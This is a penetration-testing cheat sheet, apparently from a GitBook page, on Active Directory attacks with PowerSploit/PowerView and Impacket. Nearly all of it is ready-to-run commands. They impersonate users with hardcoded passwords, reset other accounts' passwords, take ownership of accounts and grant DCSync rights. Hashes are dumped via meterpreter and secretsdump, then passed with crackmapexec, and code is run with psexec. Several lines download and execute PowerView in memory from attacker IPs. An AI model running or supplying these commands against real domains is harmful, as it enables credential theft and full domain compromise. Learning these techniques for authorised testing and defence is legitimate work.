# Domain Enumeration + Exploitation

## PowerSploit

### Impersonate Another Domain User

````powershell
$cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);

Find-DomainShare -ComputerName fs01.burmat.local -Credential $cred -ComputerDomain burmat.local -CheckShareAccess

Invoke-UserImpersonation -Credential $cred

# now we can read the directory impersonating another user if permissions exist:
dir \\fs01.burmat.local\Private```
### Enumerate GPO's
```powershell
"{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}" | Get-DomainGPO
````

### Reset Domain User Password

If you own the owner of another AD user object (`WriteOwner`, `WriteDACL`, `GenericWrite`, `Owner`, etc), you can reset the password with ease:

{% code overflow="wrap" %}

```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;
```

{% endcode %}

You can also set yourself as owner:

```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass
```

Or you can do it using Impacket's "smbpasswd.py"

### Add/Exploit DCSync Rights

If you have `WriteDACL` rights on a domain, you can give DCSync rights to an unprivileged domain user account:

```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15/PowerView.ps1')
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\harutomo', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity harutomo -Rights DCSync
```

{% code overflow="wrap" %}

```powershell
Add-DomainObjectAcl -TargetIdentity "DC=burmat,DC=local" -PrincipalIdentity jsmith -Rights DCSync
```

{% endcode %}

And you can use these rights to dump the hashes from the domain:

#### from a meterpreter

```
meterpreter > dcsync_ntlm burmat.local\\jsmith
```

#### using impacket secretsdump.py

```bash
# From attacker machine
./secretsdump.py htb.local/harutomo:Password123@10.10.10.161
```

You can then crack the collected hashes by using crackmapexec

```
crackmapexec smb 10.10.10.161 -u administrator -H <hash>
```

<figure><img src="https://399930968-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXRskZqnMB3ERzndndCxz%2Fuploads%2F8qtc8eKQMv5gJYLcAWEx%2Fimage.png?alt=media&#x26;token=43bef386-9c22-422d-aa8c-e232735ae1d1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://399930968-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXRskZqnMB3ERzndndCxz%2Fuploads%2FVT9kWxQue7Lm5nkDKOJ1%2Fimage.png?alt=media&#x26;token=0ee67af0-b182-43b9-bed0-5da747c32641" alt=""><figcaption></figcaption></figure>

Then you can execute codes using impacket-psexec

<figure><img src="https://399930968-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXRskZqnMB3ERzndndCxz%2Fuploads%2FEdSPvPJwJpEE5kBxtROX%2Fimage.png?alt=media&#x26;token=a83d8329-29b7-4e54-93fc-80864f26b053" alt=""><figcaption></figcaption></figure>